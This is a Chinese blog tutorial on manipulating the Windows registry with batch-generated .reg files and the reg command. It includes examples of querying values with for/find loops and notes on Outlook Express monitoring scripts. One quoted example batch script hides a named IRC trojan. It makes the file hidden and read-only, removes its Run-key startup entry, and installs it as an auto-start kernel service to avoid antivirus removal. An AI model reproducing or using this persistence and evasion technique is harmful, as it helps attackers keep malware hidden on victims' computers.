一,批處理生成.Reg文件操作注冊(cè)表
用批處理中的重定向符號(hào)可以輕松地生成.reg文件。然后用命令執(zhí)行.reg文件即可!
這里,著重要了解.reg文件操作注冊(cè)表的方法。
首先.reg文件首行必須是:Windows Registry Editor Version 5.00。然后才是操作注冊(cè)表的內(nèi)容。
(就和從注冊(cè)表中導(dǎo)出的文件格式一致)
1,創(chuàng)建子項(xiàng)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/TTT]
在HKEY_LOCAL_MACHINE/SOFTWARE/下創(chuàng)建了一個(gè)名字為“TTT”的子項(xiàng)。
2,創(chuàng)建一個(gè)項(xiàng)目名稱
復(fù)制代碼 代碼如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/TTT]
"Name"="TTT BLOG"
"EMail"="taoether@gmail.com"
"URL"="http://www.taoyoyo.net/ttt/"
"Type"=dword:02
這樣就在[HKEY_LOCAL_MACHINE/SOFTWARE/TTT]下新建了:Name、EMail、 URL、Type這四個(gè)項(xiàng)目
Name、Email、URL的類型是“String Value”
Type的類型是“DWORD Value”
(附:windows注冊(cè)表值類型:
REG_SZ 字符串值
REG_BINARY 二進(jìn)制值
REG_DWORD DWORD值
REG_MULTI_SZ 多字符串值
REG_EXPAND_SZ 可擴(kuò)充字符串值)
3,修改鍵值
修改相對(duì)來說比較簡(jiǎn)單,只要把你需要修改的項(xiàng)目導(dǎo)出,然后用記事本進(jìn)行修改,然后導(dǎo)入(regedit /s)即可。就象新建一樣即可。可以一次修改同一子項(xiàng)下的多個(gè)項(xiàng)目。
4,刪除項(xiàng)目名稱
復(fù)制代碼 代碼如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/TTT]
"EMail"=-
執(zhí)行該腳本,"EMail"就被刪除了;
5,刪除子項(xiàng)
復(fù)制代碼 代碼如下:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/TTT]
[-HKEY_LOCAL_MACHINE/SOFTWARE/DDD]
執(zhí)行該腳本,子項(xiàng)ttt和ddd就已經(jīng)被刪除了。
6,.reg文件執(zhí)行方法
1)直接執(zhí)行reg文件
2)regedit /s *.reg (/s不用確認(rèn))
3)reg import *.reg
7,其實(shí),我們也可以用dll文件代替reg文件。
批處理例1:
復(fù)制代碼 代碼如下:
@echo off
echo Windows Registry Editor Version 5.00 >t1.reg
echo.
echo [HKEY_LOCAL_MACHINE/SOFTWARE/TTT] >>t1.reg
echo "Name"="TTT BLOG" >>t1.reg
echo "EMail"="taoether@gmail.com" >>t1.reg
echo "URL"="http://www.taoyoyo.net/ttt/" >>t1.reg
echo "Type"=dword:02 >>t1.reg
regedit /s t1.reg
del /q t1.reg
pause
批處理2:(這個(gè)例子是別人的,不是很懂的說~~)
我們現(xiàn)在在使用一些比較老的木馬時(shí),可能會(huì)在注冊(cè)表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/ Windows/CurrentVersion/Run(Runonce、Runservices、Runexec)]下生成一個(gè)鍵值用來實(shí)現(xiàn)木馬的自啟 動(dòng).但是這樣很容易暴露木馬程序的路徑,從而導(dǎo)致木馬被查殺,相對(duì)地若是將木馬程序注冊(cè)為系統(tǒng)服務(wù)則相對(duì)安全一些.下面以配置好地IRC木馬DSNX為例 (名為windrv32.exe)
復(fù)制代碼 代碼如下:
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊(cè)表中的啟動(dòng)項(xiàng),用sc.exe將之注冊(cè)為系統(tǒng)關(guān)鍵性服務(wù)的同時(shí)將其屬性設(shè)為隱藏和只讀,并config為自啟動(dòng)]
@REM 這樣不是更安全^_^.
二,reg命令操作注冊(cè)表
Reg命令是Windows提供的一下專門操作注冊(cè)表的工具。可以方便的查詢,添加,刪除,導(dǎo)入,導(dǎo)出,比較等操作。具體可以參考系統(tǒng)自帶的幫助……
REG Operation [參數(shù)列表]
Operation [ QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT ]
1,查詢所有子項(xiàng)和值
D:/>reg query hklm/software/TTT
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE/software/TTT
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2
2,查詢特定項(xiàng)
D:/>reg query hklm/software/ttt /v url
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE/software/ttt
url REG_SZ http://www.taoyoyo.net/ttt/
這里最難的是如何取得我們想要的字符串呢,困惑了好長(zhǎng)時(shí)間,終于找到方法了。
原來也沒有別的好辦法,只能用find,for循環(huán)來截取我們需要的內(nèi)容。(下面的例子如果看不懂,請(qǐng)參考本博客另外的文章:DOS循環(huán)-bat/批處理for命令詳解之二)
例如我們要得到url的鍵值: http://www.taoyoyo.net/ttt/,可以用以下腳本:
復(fù)制代碼 代碼如下:
@ECHO OFF
for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE/software/ttt" ^| find /i "URL"') do SET "pURL=%%k"
echo TTT BLOG的URL值為:%pURL%
保存為Test.bat,運(yùn)行結(jié)果如下:
D:/>test.bat
TTT BLOG的URL值為:http://www.taoyoyo.net/ttt/
不行了,家里的電腦不知為啥,在命令行中一運(yùn)行“REG”命令(包括reg /?),CPU就占用100%,看任務(wù)管理器,CMD占用百分之八十多,不知道為啥……
運(yùn)行其他的命令就沒有問題,包括regedit /s……
查了一下,網(wǎng)上有說是中了木馬的原因,但查了一下,也不象。既沒有找到相關(guān)文件,而且運(yùn)行其它的命令時(shí),沒有問題……
先不搞了,正好手頭有個(gè)REG命令詳解,等會(huì)整理一下!
因?yàn)椴槎荆米约鹤龅腃lear.bat清理了一下C盤,居然清理出1個(gè)G的空間來,原來只剩幾百兆了……windows的垃圾真是多啊~~不要忘了經(jīng)常清理一下啊!
再發(fā)布兩個(gè)做好的批處理文件,可以自動(dòng)監(jiān)控OutLook Express,有需要的可以點(diǎn)擊下載……
1,OEMonitorCount.bat 功能:可以重設(shè)注冊(cè)表中OE打開次數(shù),避免超過100次時(shí)提示壓縮
2,OEMonitorSize.bat 功能:可以監(jiān)控Outlook Express郵件文件(*.dbx)大小,當(dāng)大于指定大小時(shí),生成報(bào)警日志。
這兩個(gè)文件,可以加到啟動(dòng)組里,每次開機(jī)自動(dòng)運(yùn)行!
搞這兩個(gè)主要是為了解決公司經(jīng)常出現(xiàn)的一些問題:
1)經(jīng)常有人的郵件文件超過幾個(gè)G;
2)有時(shí)而且根據(jù)提示壓縮后,可能出現(xiàn)郵件丟失。
剛發(fā)現(xiàn),下載后的文件又加了“htm"的后綴,請(qǐng)去掉此后綴再使用!
另外下載時(shí),請(qǐng)使用下面的鏈接,如:千腦電信高速下載地址、千腦網(wǎng)通高速下載地址。上面的VIP鏈接是專供千腦用戶使用的~~
